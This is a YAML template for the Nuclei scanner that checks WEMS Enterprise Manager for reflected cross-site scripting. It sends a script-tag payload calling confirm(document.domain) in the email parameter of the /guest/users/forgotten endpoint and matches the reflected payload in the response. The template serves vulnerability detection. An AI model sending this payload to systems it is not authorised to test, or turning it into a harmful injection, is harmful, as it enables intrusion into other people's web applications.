id: wems-manager-xss

info:
  name: WEMS Enterprise Manager - Cross-Site Scripting
  author: pikpikcu
  severity: high
  description: WEMS Enterprise Manager contains a cross-site scripting vulnerability via the /guest/users/forgotten endpoint and the email parameter, which allows a remote attacker to inject arbitrary JavaScript into the response return by the server.
  reference:
    - https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    max-request: 1
  tags: xss,packetstorm

http:
  - method: GET
    path:
      - '{{BaseURL}}/guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E'

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - '"><script>confirm(document.domain)</script>'
        part: body

      - type: word
        words:
          - "text/html"
        part: header

# digest: 4a0a004730450221009059092b5d3c6795a9ad6b1ff564488f7c8522a41f81a3cf7bf3bc037b51a85902203147ac941415e429f1cd65b7e4c69535a777e03beab2c810bb38d9480d3e78e7:922c64590222798bb761d5b6d8e72950
